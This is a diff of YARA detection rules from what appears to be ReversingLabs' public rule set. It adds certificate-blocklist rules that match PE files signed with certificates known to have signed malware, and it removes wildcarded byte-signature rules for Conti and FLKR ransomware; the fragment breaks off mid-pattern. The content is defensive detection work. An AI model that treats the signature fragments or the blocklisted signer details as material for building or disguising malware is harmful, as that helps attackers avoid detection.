+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15554-L15570"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "4bee740eaf359462cd85c6232160c6b1fc3df67acfe731da9978f0b8a304a93f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhengzhoushi Tiekelian Information Technology Co.,Ltd" and pe.signatures [ i ] . serial == "55:ab:71:a3:f9:dd:e3:ef:20:c7:88:dd:1d:5f:f6:c3" and 1323907200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "30570c07-9ba1-5b7c-a369-c6def80f9dc5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15572-L15588"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "7a1130413ae8807dc1ec96a6b1c3bac705a1520f7268db2848b997f6f3f9fc9b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:ec:a2:62:10:73:7a:54:42:ff:8b:47" and 1476437049 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "dc8428f3-ff28-5fcf-9855-f20c68973afe"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15590-L15606"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "604ba3fa671cc98e42caf80d07bc9650d193f898413517b46482f183b0f7008a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0f:20:38:39:a9:c6:3b:87:98:a7:cb:31" and 1480923809 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "506b217e-ea82-5f14-880e-b6c0cbb001fb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15608-L15626"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "2b261624677a1c4a1ef539106bedcef30f272fda3d833d4c8095e9797d592e1f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEGAPOLISELIT, OOO" and ( pe.signatures [ i ] . serial == "00:dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" or pe.signatures [ i ] . serial == "dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" ) and 1497916800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4645eeae-2aea-59aa-a6bf-095bb9d0d711"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15628-L15644"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "0516af7b27d244f21c9cea62fe599725d412e385e34f5f3f4f618d565365d321"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "41:bd:49:bb:45:66:44:d8:18:3b:3d:ae:72:ec:8f:22" and 1468454400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "a4224bf1-1875-5b2c-b79d-998d3766d163"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15646-L15664"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "27ec32791eaeccb8aa95d023c4fc8943f0435c32d8a17bde98d7d0b02ba17e59"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES LTD." and ( pe.signatures [ i ] . serial == "00:a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" or pe.signatures [ i ] . serial == "a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" ) and 1547424000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6dd35efb-daea-5668-a01d-f5b80371b04c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15666-L15682"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "8c96fbd10672b0b258a80f3abaf0320540c5ff0a4636f011cfe7cfa8ccc482d0"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBM" and pe.signatures [ i ] . serial == "30:76:42:e1:f3:a9:2c:6c:c2:e7:fb:6e:18:f2:dd:cb" and 1500422400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "478994c1-c1c4-5f11-b78f-fe237b687bef"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15684-L15700"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "245e994024e08add755ec704b895286c115ac00eb5aeecde98fce96f35f6e9e0"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "52:37:91:31:a1:c6:92:63:c7:95:a7:d3:98:db:09:97" and 1476748800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "9bc1a8f4-36b7-52bd-9a65-fcd8ec2acf92"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15702-L15718"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "8e34636ed815812af478dd01eacd5298fa2cfeb420ee2f45e055f557534cae71"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR ADAMS CONSULTING LIMITED" and pe.signatures [ i ] . serial == "44:31:2c:b9:a9:27:b4:11:13:60:76:2b:4d:4b:dd:6d" and 1554768000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "601ddd98-8cd5-5c52-a59a-d4a0556fc316"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15720-L15736"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "f55835c7404edab96bc5c8fe3844f3380f1f6bc8b43da1d51213de899629e8f5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "12:3a:50:74:06:91:62:f4:ed:68:fc:7d:48:f4:64:c2" and 1472428800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "5f4da614-3bc8-5ae8-b04b-e4b3972522ff"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15738-L15754"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "03adb8a9bf2a8f0633b34d5c39816b47e60b9e598208f7de79ad9d9a7ab8cc5e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV \"MARIYA\"" and pe.signatures [ i ] . serial == "64:eb:04:b8:de:f3:82:b5:ef:a7:5f:63:e0:e8:5a:d0" and 1535587200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f7eae73e-6b12-5507-846e-d3b409243adf"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15756-L15772"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "87f9930967d5832d3003672eeb89669b54feed1ca2ea5eec478c50e3cb7a7571"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "76:d8:d9:08:ee:d2:f9:85:7d:c5:67:6a:68:0c:ea:c9" and 1467158400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "548b8836-83cb-560c-af5f-33bdb24d15ed"
-		date = "2020-12-14"
-		modified = "2020-12-14"
+		id = "b9a1b1a7-2333-5a6f-85c9-6c19d34c4aa4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Conti.yara#L1-L74"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15774-L15790"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4f2b96c8eaf8d112a7bb60647db49616935a336396c705d39d5bb51dfd90c60b"
+		logic_hash = "6977d48a2e31235d780cba1b84b39a90e409ee8ea5555e01cbc34989ecd3882d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Conti"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B D9 53 FF 15 ?? ?? ?? ?? 89 44 24 ??
-            8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 44
-            24 ?? B9 ?? ?? ?? ?? 53 BE ?? ?? ?? ?? 57 66 83 7C 43 ?? ?? 0F 45 F1 FF 15 ?? ?? ??
-            ?? 56 57 FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ??
-            8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B
-            CB E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B CE E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B CB E8 ?? ?? ?? ?? 8B F0 85 F6
-            74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 5A 8B C8 C6 01 ?? 41
-            83 EA ?? 75 ?? 83 48 ?? ?? 50 89 70 ?? A1 ?? ?? ?? ?? 52 6A ?? FF 70 ?? FF 15 ?? ??
-            ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? E8 ??
-            ?? ?? ?? 83 FF ?? 74 ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BB ?? ?? ?? ?? 8B F9 53 57 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 75 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? FF 74 B5 ?? 57 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 46 83 FE ?? 7C ?? 33 C0 40 EB ?? 85 C0 75 ?? 8B 35 ?? ?? ?? ?? BB ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 53 56 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 2B C6 D1 F8 74 ?? 85 C0 78 ?? 40 50 56 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 56 FF 15 ??
-            ?? ?? ?? 8B F0 85 F6 74 ?? 83 C6 ?? EB ?? 33 C0 5F 5E 5B C9 C3
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 83 EC ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB 53 FF 15 ?? ??
-            ?? ?? 8B F8 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 5E 56 68 ?? ?? ??
-            ?? 53 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53
-            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 53 53 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 4D ??
-            8B D7 FF 75 ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ??
-            8B 45 ?? B9 ?? ?? ?? ?? 83 48 ?? ?? 8B 45 ?? 8B 58 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74
-            ?? 53 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ??
-            ?? 8B CE E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 49 ?? E8 ?? ?? ?? ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telefonicasa" and pe.signatures [ i ] . serial == "08:3e:3f" and 999002664 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_FLKR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FLKR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7f3abcd0-8dfa-5914-9ad0-566c16c2e2ab"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "350f7c25-f20f-5e8f-aa52-163cf3de3be1"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FLKR.yara#L1-L71"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15792-L15808"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4ab00ba82baceec9899556d3a774ec08c83c10930cec194e18e3b4e16ebacb58"
+		logic_hash = "73e920d51faf7150329ce189d1693c29a2285a02d54fee27e5af5afe3238295b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FLKR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_p1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 8B BC 24 ??
-            ?? ?? ?? 57 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 44
-            24 ?? FF D5 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 54 24 ?? 52 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
-            57 C6 04 07 ?? FF D5 F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84
-            C0 0F 85 ?? ?? ?? ?? 8A 0F 33 D2 84 C9 74 ?? BE ?? ?? ?? ?? 8B C7 2B F7 88 0C 06 8A
-            48 ?? 40 42 84 C9 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 82 ?? ?? ?? ?? ?? C6 82 ??
-            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6
-            74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? 57 FF D5 57 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 38 44 24 ?? 74
-        }
-		$search_and_encrypt_p2 = {
-            40 80 7C 04 ?? ?? 75 ?? 8A 4C 04 ?? 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 80 7C 04 ??
-            ?? 75 ?? 80 7C 04 ?? ?? 74 ?? 80 F9 ?? 75 ?? B3 ?? 38 5C 04 ?? 75 ?? 80 7C 04 ?? ??
-            75 ?? 80 7C 04 ?? ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? FF 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? B3 ?? B2 ?? 80 F9 ?? 75 ?? 38 5C 04 ?? 75
-            ?? 80 7C 04 ?? ?? 75 ?? 38 5C 04 ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
-            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
-            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 0F 84 ?? ?? ?? ?? 84 D2 0F 84 ?? ?? ?? ?? 8A 0F
-            33 D2 84 C9 74 ?? 8D B4 24 ?? ?? ?? ?? 8B C7 2B F7 8D A4 24 ?? ?? ?? ?? 88 0C 06 8A
-            48 ?? 40 42 84 C9 75 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 0F B6
-            05 ?? ?? ?? ?? C6 84 14 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 33 C0 6A ?? 89 8C 24 ?? ?? ?? ?? 89 94 24 ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 68 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 0D ??
-            ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B E8 A1 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 66 8B 15 ?? ?? ??
-            ?? 89 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 8D 74 24 ?? 89 6C 24 ?? 66 89
-        }
-		$search_and_encrypt_p3 = {
-            94 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ??
-            52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
